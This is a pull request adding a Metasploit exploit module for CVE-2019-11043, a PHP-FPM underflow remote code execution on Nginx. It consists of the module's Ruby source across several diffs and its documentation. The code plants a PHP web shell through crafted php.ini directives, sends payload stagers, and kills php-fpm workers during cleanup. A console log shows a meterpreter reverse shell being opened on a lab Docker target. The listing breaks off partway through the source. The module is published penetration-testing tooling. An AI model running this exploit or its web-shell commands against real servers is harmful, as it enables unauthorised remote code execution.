### PR TITLE
Add PHP-FPM Underflow RCE module

### DIFF
--- a/documentation/modules/exploit/multi/http/php_fpm_rce.md
+++ b/documentation/modules/exploit/multi/http/php_fpm_rce.md
@@ -1,4 +1,15 @@
-This module exploits an underflow vulnerability in versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 of PHP-FPM on Nginx. Only servers with certains Nginx + PHP-FPM configurations are exploitable. This is a port of the original neex's exploit code (see refs.). First, it detects the correct parameters (Query String Length and custom header length) needed to trigger code execution. This step determines if the target is actually vulnerable (Check method). Then, the exploit sets a series of PHP INI directives to create a file (`/tmp/a`) locally on the target, which enables code execution through a query string parameter (`?a=<cmd>`). This is used to execute normal payload stagers. Finally, this module does some cleanup by killing local PHP-FPM workers (those are spawned automatically once killed) and removing the created local file (`/tmp/a`).
+This module exploits an underflow vulnerability in versions 7.1.x below 7.1.33,
+7.2.x below 7.2.24 and 7.3.x below 7.3.11 of PHP-FPM on Nginx. Only servers
+with certains Nginx + PHP-FPM configurations are exploitable. This is a port of
+the original neex's exploit code (see refs.). First, it detects the correct
+parameters (Query String Length and custom header length) needed to trigger
+code execution. This step determines if the target is actually vulnerable
+(Check method). Then, the exploit sets a series of PHP INI directives to create
+a file (`/tmp/a`) locally on the target, which enables code execution through a
+query string parameter (`?a=<cmd>`). This is used to execute normal payload
+stagers. Finally, this module does some cleanup by killing local PHP-FPM
+workers (those are spawned automatically once killed) and removing the created
+local file (`/tmp/a`).
 
 ## Vulnerable Application
 - Install Nginx on Linux (`apt-get install nginx`)
@@ -12,7 +23,8 @@ git -C php-src checkout ab061f95ca966731b1c84cf5b7b20155c0a1c06a
 git -C php-src checkout HEAD~1
 ```
 
-- make sure the default Nginx configuration contains these entries and no script existence checks (like `try_files`):
+- make sure the default Nginx configuration contains these entries and no
+  script existence checks (like `try_files`):
 
 ```
 location ~ [^/]\.php(/|$) {
@@ -26,7 +38,9 @@ location ~ [^/]\.php(/|$) {
 
 See original PoC for details: https://github.com/neex/phuip-fpizdam
 
-An easiest way to setup a vulnerable instance is to use the docker configuration provided by the author (https://github.com/neex/phuip-fpizdam/tree/master/reproducer)
+An easiest way to setup a vulnerable instance is to use the docker
+configuration provided by the author
+(https://github.com/neex/phuip-fpizdam/tree/master/reproducer)
 
 ## Verification Steps
 
@@ -56,34 +70,54 @@ An easiest way to setup a vulnerable instance is to use the docker configuration
 ## Advanced Options
 
   **MinQSL**
-  Minimum query string length (QSL). The QSL detection engine will iterate starting from this value (1500 by default). This option is required.
+  Minimum query string length (QSL). The QSL detection engine will iterate
+  starting from this value (1500 by default). This option is required.
 
   **MaxQSL**
-  Maximum query string length (QSL). The QSL detection engine will iterate until this value is reached (1950 by default). This option is required.
+  Maximum query string length (QSL). The QSL detection engine will iterate
+  until this value is reached (1950 by default). This option is required.
 
   **QSLHint**
-  Query string length hint. This value will be used as a QSL candidate. Note that setting this value skips the QSL detection.
+  Query string length hint. This value will be used as a QSL candidate. Note
+  that setting this value skips the QSL detection.
 
   **QSLDetectStep**
-  Query string length detect step. The QSL detection engine will iterate with this step value (5 by default). This option is required.
+  Query string length detect step. The QSL detection engine will iterate with
+  this step value (5 by default). This option is required.
 
   **MaxQSLCandidates**
-  Maximum query string length candidates. When the number of QSL candidates found during the QSL detection phase is greater than this value (10 by default), this indicates that something went wrong and we were not able to detect the correct values. This option is required.
+  Maximum query string length candidates. When the number of QSL candidates
+  found during the QSL detection phase is greater than this value (10 by
+  default), this indicates that something went wrong and we were not able to
+  detect the correct values. This option is required.
 
   **MaxQSLDetectDelta**
-  Maximum query string length detection delta. This value is the maximum distance between the candidate and the extended values (10 by default). For example, with a value of 20 and QSLDetectStep set to 5, candidate [1700] will be extended to [1680, 1685, 1690, 1695, 1700]. This option is required.
+  Maximum query string length detection delta. This value is the maximum
+  distance between the candidate and the extended values (10 by default). For
+  example, with a value of 20 and QSLDetectStep set to 5, candidate [1700] will
+  be extended to [1680, 1685, 1690, 1695, 1700]. This option is required.
 
   **MaxCustomHeaderLength**
-  Maximum custom header length. This value is the maximum length that will be used for the custom header during the parameters detection (256 by default). This option is required.
+  Maximum custom header length. This value is the maximum length that will be
+  used for the custom header during the parameters detection (256 by default).
+  This option is required.
 
   **CustomHeaderLengthHint**
-  Custom header length hint. This value will be used as the custom header length. Note that setting this value skips the custom header length detection.
+  Custom header length hint. This value will be used as the custom header
+  length. Note that setting this value skips the custom header length
+  detection.
 
   **DetectMethod**
-  Method that will be used to detect if the target is vulnerable. Available methods:
+  Method that will be used to detect if the target is vulnerable. Available
+  methods:
 
-  1. `session.auto_start`: this method consist in setting the `session.auto_start` PHP option to 1. If the response contains `PHPSESSID=` set-cookie value, this means the PHP option has been correctly set and the target is vulnerable.
-  2. `output_handler.md5`: this method consist in setting the `output_handler` PHP option to `md5`. If the response is a md5 hash (16 characters), this means the PHP option has been correctly set and the target is vulnerable.
+  1. `session.auto_start`: this method consist in setting the
+  `session.auto_start` PHP option to 1. If the response contains `PHPSESSID=`
+  set-cookie value, this means the PHP option has been correctly set and the
+  target is vulnerable.
+  2. `output_handler.md5`: this method consist in setting the `output_handler`
+  PHP option to `md5`. If the response is a md5 hash (16 characters), this
+  means the PHP option has been correctly set and the target is vulnerable.
 
 
 ## Scenarios

--- a/documentation/modules/exploit/multi/http/php_fpm_rce.md
+++ b/documentation/modules/exploit/multi/http/php_fpm_rce.md
@@ -1,0 +1,133 @@
+This module exploits an underflow vulnerability in versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 of PHP-FPM on Nginx. Only servers with certains Nginx + PHP-FPM configurations are exploitable. This is a port of the original neex's exploit code (see refs.). First, it detects the correct parameters (Query String Length and custom header length) needed to trigger code execution. This step determines if the target is actually vulnerable (Check method). Then, the exploit sets a series of PHP INI directives to create a file (`/tmp/a`) locally on the target, which enables code execution through a query string parameter (`?a=<cmd>`). This is used to execute normal payload stagers. Finally, this module does some cleanup by killing local PHP-FPM workers (those are spawned automatically once killed) and removing the created local file (`/tmp/a`).
+
+## Vulnerable Application
+- Install Nginx on Linux (`apt-get install nginx`)
+- get the vulnerable PHP:
+
+```
+git clone https://github.com/php/php-src
+# checkout the fix
+git -C php-src checkout ab061f95ca966731b1c84cf5b7b20155c0a1c06a
+# checkout the commit previous to the fix
+git -C php-src checkout HEAD~1
+```
+
+- make sure the default Nginx configuration contains these entries and no script existence checks (like `try_files`):
+
+```
+location ~ [^/]\.php(/|$) {
+  ...
+  fastcgi_split_path_info ^(.+?\.php)(/.*)$;
+  fastcgi_param PATH_INFO       $fastcgi_path_info;
+  fastcgi_pass   php:9000;
+  ...
+}
+```
+
+See original PoC for details: https://github.com/neex/phuip-fpizdam
+
+An easiest way to setup a vulnerable instance is to use the docker configuration provided by the author (https://github.com/neex/phuip-fpizdam/tree/master/reproducer)
+
+## Verification Steps
+
+  Preparing the target:
+
+  1. `git clone https://github.com/neex/phuip-fpizdam`
+  2. `cd phuip-fpizdam/reproducer/`
+  3. `docker build -t reproduce-cve-2019-11043 .`
+  4. `docker run --rm -p 192.168.6.6:8080:80 --name reproduce-cve-2019-11043 reproduce-cve-2019-11043`
+
+  Running the exploit:
+
+  1. `./msfconsole`
+  2. `use exploit/multi/http/php_fpm_rce`
+  4. `set RHOSTS 192.168.6.6`
+  5. `set RPORT 8080`
+  4. `set TARGETURI /script.php`
+  6. `set PAYLOAD php/meterpreter/reverse_tcp`
+  7. `set LHOST 192.168.6.6`
+  8. `run`
+
+## Options
+
+   **TARGETURI**
+   Path to a PHP page. This must be a valid page.
+
+## Advanced Options
+
+  **MinQSL**
+  Minimum query string length (QSL). The QSL detection engine will iterate starting from this value (1500 by default). This option is required.
+
+  **MaxQSL**
+  Maximum query string length (QSL). The QSL detection engine will iterate until this value is reached (1950 by default). This option is required.
+
+  **QSLHint**
+  Query string length hint. This value will be used as a QSL candidate. Note that setting this value skips the QSL detection.
+
+  **QSLDetectStep**
+  Query string length detect step. The QSL detection engine will iterate with this step value (5 by default). This option is required.
+
+  **MaxQSLCandidates**
+  Maximum query string length candidates. When the number of QSL candidates found during the QSL detection phase is greater than this value (10 by default), this indicates that something went wrong and we were not able to detect the correct values. This option is required.
+
+  **MaxQSLDetectDelta**
+  Maximum query string length detection delta. This value is the maximum distance between the candidate and the extended values (10 by default). For example, with a value of 20 and QSLDetectStep set to 5, candidate [1700] will be extended to [1680, 1685, 1690, 1695, 1700]. This option is required.
+
+  **MaxCustomHeaderLength**
+  Maximum custom header length. This value is the maximum length that will be used for the custom header during the parameters detection (256 by default). This option is required.
+
+  **CustomHeaderLengthHint**
+  Custom header length hint. This value will be used as the custom header length. Note that setting this value skips the custom header length detection.
+
+  **DetectMethod**
+  Method that will be used to detect if the target is vulnerable. Available methods:
+
+  1. `session.auto_start`: this method consist in setting the `session.auto_start` PHP option to 1. If the response contains `PHPSESSID=` set-cookie value, this means the PHP option has been correctly set and the target is vulnerable.
+  2. `output_handler.md5`: this method consist in setting the `output_handler` PHP option to `md5`. If the response is a md5 hash (16 characters), this means the PHP option has been correctly set and the target is vulnerable.
+
+
+## Scenarios
+
+### Ubuntu 18.04 + nginx 1.14.0 + PHP 7.1.33dev (fpm-fcgi) (built: Feb 14 2020 16:48:15)
+
+```
+msf5 > use exploit/multi/http/php_fpm_rce
+msf5 exploit(multi/http/php_fpm_rce) > set RHOSTS 192.168.6.6
+RHOSTS => 192.168.6.6
+msf5 exploit(multi/http/php_fpm_rce) > set RPORT 8080
+RPORT => 8080
+msf5 exploit(multi/http/php_fpm_rce) > set TARGETURI /script.php
+TARGETURI => /script.php
+msf5 exploit(multi/http/php_fpm_rce) > set PAYLOAD php/meterpreter/reverse_tcp
+PAYLOAD => php/meterpreter/reverse_tcp
+msf5 exploit(multi/http/php_fpm_rce) > set LHOST 192.168.6.6
+LHOST => 192.168.6.6
+msf5 exploit(multi/http/php_fpm_rce) > run
+
+[*] Started reverse TCP handler on 192.168.6.6:4444
+[*] Sending baseline query...
+[*] Detecting QSL...
+[+] The target is probably vulnerable. Possible QSLs: [1765]
+[*] Doing sanity check...
+[*] Detecting attack parameters...
+[+] Parameters found: QSL=1760, customh_length=69
+[+] Target is vulnerable!
+[*] Performing attack using php.ini settings...
+[+] Success! Was able to execute a command by appending 'which+which'
+[*] Trying to cleanup /tmp/a...
+[+] Cleanup done!
+[*] Sending payload...
+[*] Sending stage (38288 bytes) to 192.168.6.6
+[*] Meterpreter session 1 opened (192.168.6.6:4444 -> 192.168.6.6:59177) at 2020-02-14 12:03:45 -0600
+[+] Session created
+[*] Remove /tmp/a and kill workers...
+[+] Done!
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > sysinfo
+Computer    : 832efebeac57
+OS          : Linux 832efebeac57 4.9.184-linuxkit #1 SMP Tue Jul 2 22:58:16 UTC 2019 x86_64
+Meterpreter : php/linux
+meterpreter >
+```

--- a/documentation/modules/exploit/multi/http/php_fpm_rce.md
+++ b/documentation/modules/exploit/multi/http/php_fpm_rce.md
@@ -65,7 +65,7 @@ configuration provided by the author
 ## Options
 
    **TARGETURI**
-   Path to a PHP page. This must be a valid page.
+   Path to a PHP page (`/index.php` by default). This must be a valid page.
 
 ## Advanced Options
 
@@ -119,6 +119,9 @@ configuration provided by the author
   PHP option to `md5`. If the response is a md5 hash (16 characters), this
   means the PHP option has been correctly set and the target is vulnerable.
 
+  **OperationMaxRetries**
+  Maximum of operation retries. Each operation will be repeated at most
+  `OperationMaxRetries` times.
 
 ## Scenarios
 

--- a/modules/exploits/multi/http/php_fpm_rce.rb
+++ b/modules/exploits/multi/http/php_fpm_rce.rb
@@ -23,11 +23,11 @@ class MetasploitModule < Msf::Exploit::Remote
           and custom header length) needed to trigger code execution. This step
           determines if the target is actually vulnerable (Check method). Then,
           the exploit sets a series of PHP INI directives to create a file
-          (/tmp/a) locally on the target, which enables code execution through
-          a query string parameter (?a=<cmd>). This is used to execute normal
-          payload stagers. Finally, this module does some cleanup by killing
-          local PHP-FPM workers (those are spawned automatically once killed)
-          and removing the created local file (/tmp/a).
+          locally on the target, which enables code execution through a query
+          string parameter. This is used to execute normal payload stagers.
+          Finally, this module does some cleanup by killing local PHP-FPM
+          workers (those are spawned automatically once killed) and removing
+          the created local file.
         ),
         'Author'         => [
           'neex',          # (Emil Lerner) Discovery and original exploit code
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'php',
               'Arch'     => ARCH_PHP,
               'Payload'  => {
-                'PrependEncoder' => "php+-r+\"",
+                'PrependEncoder' => "php -r \"",
                 'AppendEncoder'  => "\""
               }
             }
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      OptString.new('TARGETURI', [true, 'Path to a PHP page', ''])
+      OptString.new('TARGETURI', [true, 'Path to a PHP page', '/index.php'])
     ])
 
     register_advanced_options([
@@ -93,14 +93,13 @@ class MetasploitModule < Msf::Exploit::Remote
         self.class.detect_methods.keys,
         /(#{self.class.detect_methods.keys.join('|')})/
       ]),
-      OptInt.new('PosOffset', [true, 'Position offset', 34]),
       OptInt.new('OperationMaxRetries', [true, 'Maximum of operation retries', 20])
     ])
     @filename = rand_text_alpha(1)
     @http_param = rand_text_alpha(1)
   end
 
-  CHECK_COMMAND   = "which+which"
+  CHECK_COMMAND   = "which which"
   SUCCESS_PATTERN = "/bin/which"
 
   class DetectMethod
@@ -132,12 +131,13 @@ class MetasploitModule < Msf::Exploit::Remote
     }
   end
 
-  def send_crafted_request(path:, qsl: datastore['MinQSL'], customh_length: 1, prefix: '', allow_retry: true)
+  def send_crafted_request(path:, qsl: datastore['MinQSL'], customh_length: 1, cmd: '', allow_retry: true)
     uri = URI.encode(normalize_uri(target_uri.path, path)).gsub(/([?&])/, {'?'=>'%3F', '&'=>'%26'})
     qsl_delta = uri.length - path.length - URI.encode(target_uri.path).length
     if qsl_delta.odd?
       fail_with Failure::Unknown, "Got odd qslDelta, that means the URL encoding gone wrong: path=#{path}, qsl_delta=#{qsl_delta}"
     end
+    prefix = cmd.empty? ? '' : "#{@http_param}=#{URI.encode(cmd)}%26"
     qsl_prime = qsl - qsl_delta/2 - prefix.length
     if qsl_prime < 0
       vprint_error("qsl value too small: qsl=#{qsl}, qsl_delta=#{qsl_delta}, prefix=#{prefix}")
@@ -215,19 +215,20 @@ class MetasploitModule < Msf::Exploit::Remote
     return true
   end
 
-  def set_php_setting(php_setting:, qsl:, customh_length:, query_string_prefix: '')
+  def set_php_setting(php_setting:, qsl:, customh_length:, cmd: '')
     res = nil
     path = "/PHP_VALUE\n#{php_setting}"
-    if path.length > datastore['PosOffset']
+    pos_offset = 34
+    if path.length > pos_offset
       vprint_error("php.ini value is too long: #{php_value}")
       return nil
     end
-    path += ';' * (datastore['PosOffset'] - path.length)
+    path += ';' * (pos_offset - path.length)
     res = send_crafted_request(
       path: path,
       qsl: qsl,
       customh_length: customh_length,
-      prefix: query_string_prefix
+      cmd: cmd
     )
     unless res
       vprint_error("error while setting #{php_setting} for qsl=#{qsl}, customh_length=#{customh_length}")
@@ -293,7 +294,7 @@ class MetasploitModule < Msf::Exploit::Remote
         php_setting: php_setting,
         qsl: @params[:qsl],
         customh_length: @params[:customh_length],
-        query_string_prefix: "#{@http_param}=/bin/sh+-c+'#{CHECK_COMMAND}'%26"
+        cmd: "/bin/sh -c '#{CHECK_COMMAND}'"
       )
       if res
         return res if res.body.include?(SUCCESS_PATTERN)
@@ -311,7 +312,7 @@ class MetasploitModule < Msf::Exploit::Remote
       path: '/',
       qsl: @params[:qsl],
       customh_length: @params[:customh_length],
-      prefix: "#{@http_param}=#{payload.encoded}%26",
+      cmd: payload.encoded,
       allow_retry: false
     )
     sleep(1)
@@ -324,7 +325,7 @@ class MetasploitModule < Msf::Exploit::Remote
       path: '/',
       qsl: @params[:qsl],
       customh_length: @params[:customh_length],
-      prefix: "#{@http_param}=#{URI.encode(cleanup_command)};#{CHECK_COMMAND}%26"
+      cmd: cleanup_command + ';' + CHECK_COMMAND
     )
     return res if res&.body.include?(SUCCESS_PATTERN)
     return nil
@@ -417,7 +418,7 @@ class MetasploitModule < Msf::Exploit::Remote
       path: '/',
       qsl: @params[:qsl],
       customh_length: @params[:customh_length],
-      prefix: "#{@http_param}=#{cleanup_cmd}%26"
+      cmd: cleanup_cmd
     )
     return res if res && res.code != @base_status
     return nil
@@ -427,7 +428,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return unless successful
     kill_workers = 'for p in `pidof php-fpm`; do kill -9 $p;done'
     rm = "rm -f /tmp/#{@filename}"
-    cleanup_cmd = "#{CGI.escape(kill_workers)};#{CGI.escape(rm)}"
+    cleanup_cmd = kill_workers + ';' + rm
     disconnect(client) if client&.conn?
     print_status("Remove /tmp/#{@filename} and kill workers...")
     if repeat_operation(:send_cleanup, cleanup_cmd: cleanup_cmd)

--- a/modules/exploits/multi/http/php_fpm_rce.rb
+++ b/modules/exploits/multi/http/php_fpm_rce.rb
@@ -70,8 +70,8 @@ class MetasploitModule < Msf::Exploit::Remote
       OptInt.new('MaxQSL', [true, 'Maximum query string length', 1950]),
       OptInt.new('QSLHint', [false, 'Query string length hint']),
       OptInt.new('QSLDetectStep', [true, 'Query string length detect step', 5]),
-      OptInt.new('MaxQSLCandidates', [true, 'Max Query string length candidates', 10]),
-      OptInt.new('MaxQSLDetectDelta', [true, 'Max Query string length detection delta', 10]),
+      OptInt.new('MaxQSLCandidates', [true, 'Max query string length candidates', 10]),
+      OptInt.new('MaxQSLDetectDelta', [true, 'Max query string length detection delta', 10]),
       OptInt.new('MaxCustomHeaderLength', [true, 'Max custom header length', 256]),
       OptInt.new('CustomHeaderLengthHint', [false, 'Custom header length hint']),
       OptString.new('DetectMethod', [
@@ -224,7 +224,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def send_params_detection(qsl_candidates:, customh_length:, detect_method:)
     php_setting = detect_method.php_option_enable
     vprint_status("Iterating until the PHP option is enabled (#{php_setting})...")
-    qsl_candidates.product((1..customh_length).to_a) do |qsl, c_length|
+    customh_lengths = customh_length ? [customh_length] : (1..datastore['MaxCustomHeaderLength']).to_a
+    qsl_candidates.product(customh_lengths) do |qsl, c_length|
       res = set_php_setting(php_setting: php_setting, qsl: qsl, customh_length: c_length)
       unless res
         vprint_error("Error for qsl=#{qsl}, customh_length=#{c_length}")
@@ -244,13 +245,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def detect_params(qsl_candidates)
+    customh_length = nil
     if datastore['CustomHeaderLengthHint']
       vprint_status(
         "Using custom header length hint for max length (customh_length="\
-        "#{datastore['CustomHeaderLengthHint']})")
+        "#{datastore['CustomHeaderLengthHint']})"
+      )
       customh_length = datastore['CustomHeaderLengthHint']
-    else
-      customh_length = datastore['MaxCustomHeaderLength']
     end
     detect_method = self.class.detect_methods[datastore['DetectMethod']]
     return repeat_operation(
@@ -292,7 +293,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def send_payload
     disconnect(client) if client&.conn?
-    res = send_crafted_request(
+    send_crafted_request(
       path: '/',
       qsl: @params[:qsl],
       customh_length: @params[:customh_length],
@@ -300,8 +301,7 @@ class MetasploitModule < Msf::Exploit::Remote
       allow_retry: false
     )
     sleep(1)
-    return res if session_created?
-    return nil
+    return session_created? ? true : nil
   end
 
   def send_backdoor_cleanup
@@ -347,7 +347,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Detecting QSL...")
     qsl_candidates = detect_qsl
     if qsl_candidates.empty?
-      return Exploit::CheckCode::Detected("No qsl candidates found, invulnerable or something wrong")
+      return Exploit::CheckCode::Detected("No qsl candidates found, not vulnerable or something went wrong")
     end
     if qsl_candidates.size > datastore['MaxQSLCandidates']
       return Exploit::CheckCode::Detected("Too many qsl candidates found, looks like I got banned")

--- a/modules/exploits/multi/http/php_fpm_rce.rb
+++ b/modules/exploits/multi/http/php_fpm_rce.rb
@@ -15,7 +15,19 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name'           => 'PHP-FPM Underflow RCE',
         'Description'    => %q(
-        This module exploits an underflow vulnerability in versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 of PHP-FPM on Nginx. Only servers with certains Nginx + PHP-FPM configurations are exploitable. This is a port of the original neex's exploit code (see refs.). First, it detects the correct parameters (Query String Length and custom header length) needed to trigger code execution. This step determines if the target is actually vulnerable (Check method). Then, the exploit sets a series of PHP INI directives to create a file (/tmp/a) locally on the target, which enables code execution through a query string parameter (?a=<cmd>). This is used to execute normal payload stagers. Finally, this module does some cleanup by killing local PHP-FPM workers (those are spawned automatically once killed) and removing the created local file (/tmp/a).
+          This module exploits an underflow vulnerability in versions 7.1.x
+          below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 of PHP-FPM on
+          Nginx. Only servers with certains Nginx + PHP-FPM configurations are
+          exploitable. This is a port of the original neex's exploit code (see
+          refs.). First, it detects the correct parameters (Query String Length
+          and custom header length) needed to trigger code execution. This step
+          determines if the target is actually vulnerable (Check method). Then,
+          the exploit sets a series of PHP INI directives to create a file
+          (/tmp/a) locally on the target, which enables code execution through
+          a query string parameter (?a=<cmd>). This is used to execute normal
+          payload stagers. Finally, this module does some cleanup by killing
+          local PHP-FPM workers (those are spawned automatically once killed)
+          and removing the created local file (/tmp/a).
         ),
         'Author'         => [
           'neex',          # (Emil Lerner) Discovery and original exploit code
@@ -284,7 +296,7 @@ class MetasploitModule < Msf::Exploit::Remote
       if res
         return res if res.body.include?(SUCCESS_PATTERN)
       else
-        print_error("Error when setting #{php_setting}") unless re
+        print_error("Error when setting #{php_setting}")
         return nil
       end
     end

--- a/modules/exploits/multi/http/php_fpm_rce.rb
+++ b/modules/exploits/multi/http/php_fpm_rce.rb
@@ -96,6 +96,8 @@ class MetasploitModule < Msf::Exploit::Remote
       OptInt.new('PosOffset', [true, 'Position offset', 34]),
       OptInt.new('OperationMaxRetries', [true, 'Maximum of operation retries', 20])
     ])
+    @filename = rand_text_alpha(1)
+    @http_param = rand_text_alpha(1)
   end
 
   CHECK_COMMAND   = "which+which"
@@ -279,19 +281,19 @@ class MetasploitModule < Msf::Exploit::Remote
       "short_open_tag=1",
       "html_errors=0",
       "include_path=/tmp",
-      "auto_prepend_file=a",
+      "auto_prepend_file=#{@filename}",
       "log_errors=1",
       "error_reporting=2",
-      "error_log=/tmp/a",
+      "error_log=/tmp/#{@filename}",
       "extension_dir=\"<?=`\"",
-      "extension=\"$_GET[a]`?>\""
+      "extension=\"$_GET[#{@http_param}]`?>\""
     ].each do |php_setting|
       vprint_status("Sending php.ini setting: #{php_setting}")
       res = set_php_setting(
         php_setting: php_setting,
         qsl: @params[:qsl],
         customh_length: @params[:customh_length],
-        query_string_prefix: "a=/bin/sh+-c+'#{CHECK_COMMAND}'%26"
+        query_string_prefix: "#{@http_param}=/bin/sh+-c+'#{CHECK_COMMAND}'%26"
       )
       if res
         return res if res.body.include?(SUCCESS_PATTERN)
@@ -309,7 +311,7 @@ class MetasploitModule < Msf::Exploit::Remote
       path: '/',
       qsl: @params[:qsl],
       customh_length: @params[:customh_length],
-      prefix: "a=#{payload.encoded}%26",
+      prefix: "#{@http_param}=#{payload.encoded}%26",
       allow_retry: false
     )
     sleep(1)
@@ -317,12 +319,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def send_backdoor_cleanup
-    cleanup_command = ";echo '<?php echo `$_GET[a]`;return;?>'>/tmp/a"
+    cleanup_command = ";echo '<?php echo `$_GET[#{@http_param}]`;return;?>'>/tmp/#{@filename}"
     res = send_crafted_request(
       path: '/',
       qsl: @params[:qsl],
       customh_length: @params[:customh_length],
-      prefix: "a=#{URI.encode(cleanup_command)};#{CHECK_COMMAND}%26"
+      prefix: "#{@http_param}=#{URI.encode(cleanup_command)};#{CHECK_COMMAND}%26"
     )
     return res if res&.body.include?(SUCCESS_PATTERN)
     return nil
@@ -397,7 +399,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with Failure::Unknown, 'Failed to send the attack chain'
     end
 
-    print_status("Trying to cleanup /tmp/a...")
+    print_status("Trying to cleanup /tmp/#{@filename}...")
     if repeat_operation(:send_backdoor_cleanup)
       print_good('Cleanup done!')
     end
@@ -415,7 +417,7 @@ class MetasploitModule < Msf::Exploit::Remote
       path: '/',
       qsl: @params[:qsl],
       customh_length: @params[:customh_length],
-      prefix: "a=#{cleanup_cmd}%26"
+      prefix: "#{@http_param}=#{cleanup_cmd}%26"
     )
     return res if res && res.code != @base_status
     return nil
@@ -424,10 +426,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def cleanup()
     return unless successful
     kill_workers = 'for p in `pidof php-fpm`; do kill -9 $p;done'
-    rm = 'rm -f /tmp/a'
+    rm = "rm -f /tmp/#{@filename}"
     cleanup_cmd = "#{CGI.escape(kill_workers)};#{CGI.escape(rm)}"
     disconnect(client) if client&.conn?
-    print_status("Remove /tmp/a and kill workers...")
+    print_status("Remove /tmp/#{@filename} and kill workers...")
     if repeat_operation(:send_cleanup, cleanup_cmd: cleanup_cmd)
       print_good("Done!")
     else

--- a/modules/exploits/multi/http/php_fpm_rce.rb
+++ b/modules/exploits/multi/http/php_fpm_rce.rb
@@ -135,7 +135,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'agent'   => 'Mozilla/5.0',
       'headers' => {
         'CustomH' => "x=#{Rex::Text.rand_text_alphanumeric(customh_length)}",
-        'Ebut'    => Rex::Text.rand_text_alphanumeric(11)
+        'Nuut'    => Rex::Text.rand_text_alphanumeric(11)
       }
     }
     actual_timeout = datastore['HttpClientTimeout'] if datastore['HttpClientTimeout']&.> 0

--- a/modules/exploits/multi/http/php_fpm_rce.rb
+++ b/modules/exploits/multi/http/php_fpm_rce.rb
@@ -1,0 +1,428 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'PHP-FPM Underflow RCE',
+        'Description'    => %q(
+        This module exploits an underflow vulnerability in versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 of PHP-FPM on Nginx. Only servers with certains Nginx + PHP-FPM configurations are exploitable. This is a port of the original neex's exploit code (see refs.). First, it detects the correct parameters (Query String Length and custom header length) needed to trigger code execution. This step determines if the target is actually vulnerable (Check method). Then, the exploit sets a series of PHP INI directives to create a file (/tmp/a) locally on the target, which enables code execution through a query string parameter (?a=<cmd>). This is used to execute normal payload stagers. Finally, this module does some cleanup by killing local PHP-FPM workers (those are spawned automatically once killed) and removing the created local file (/tmp/a).
+        ),
+        'Author'         => [
+          'neex',          # (Emil Lerner) Discovery and original exploit code
+          'cdelafuente-r7' # This module
+        ],
+        'References'     =>
+          [
+            ['CVE', '2019-11043'],
+            ['EDB', '47553'],
+            ['URL', 'https://github.com/neex/phuip-fpizdam'],
+            ['URL', 'https://bugs.php.net/bug.php?id=78599'],
+            ['URL', 'https://blog.orange.tw/2019/10/an-analysis-and-thought-about-recently.html']
+          ],
+        'DisclosureDate' => "2019-10-22",
+        'License'        => MSF_LICENSE,
+        'Payload'        => {
+          'BadChars' => "&>\' "
+        },
+        'Targets'        => [
+          [
+            'PHP', {
+              'Platform' => 'php',
+              'Arch'     => ARCH_PHP,
+              'Payload'  => {
+                'PrependEncoder' => "php+-r+\"",
+                'AppendEncoder'  => "\""
+              }
+            }
+          ],
+          [
+            'Shell Command', {
+              'Platform' => 'unix',
+              'Arch'     => ARCH_CMD
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes'         => {
+          'Stability'   => [CRASH_SERVICE_RESTARTS],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to a PHP page', ''])
+    ])
+
+    register_advanced_options([
+      OptInt.new('MinQSL', [true, 'Minimum query string length', 1500]),
+      OptInt.new('MaxQSL', [true, 'Maximum query string length', 1950]),
+      OptInt.new('QSLHint', [false, 'Query string length hint']),
+      OptInt.new('QSLDetectStep', [true, 'Query string length detect step', 5]),
+      OptInt.new('MaxQSLCandidates', [true, 'Max Query string length candidates', 10]),
+      OptInt.new('MaxQSLDetectDelta', [true, 'Max Query string length detection delta', 10]),
+      OptInt.new('MaxCustomHeaderLength', [true, 'Max custom header length', 256]),
+      OptInt.new('CustomHeaderLengthHint', [false, 'Custom header length hint']),
+      OptString.new('DetectMethod', [
+        true,
+        "Detection method (available methods: #{self.class.detect_methods.keys.join(', ')})",
+        'session.auto_start',
+        self.class.detect_methods.keys,
+        /(#{self.class.detect_methods.keys.join('|')})/
+      ]),
+      OptInt.new('PosOffset', [true, 'Position offset', 34]),
+      OptInt.new('OperationMaxRetries', [true, 'Maximum of operation retries', 20])
+    ])
+  end
+
+  CHECK_COMMAND   = "which+which"
+  SUCCESS_PATTERN = "/bin/which"
+
+  class DetectMethod
+    attr_reader :php_option_enable, :php_option_disable
+
+    def initialize(php_option_enable:, php_option_disable:, check_cb:)
+      @php_option_enable = php_option_enable
+      @php_option_disable = php_option_disable
+      @check_cb = check_cb
+    end
+
+    def php_option_enabled?(res)
+      !!@check_cb.call(res)
+    end
+  end
+
+  def self.detect_methods
+    {
+      'session.auto_start' => DetectMethod.new(
+        php_option_enable: 'session.auto_start=1',
+        php_option_disable: 'session.auto_start=0',
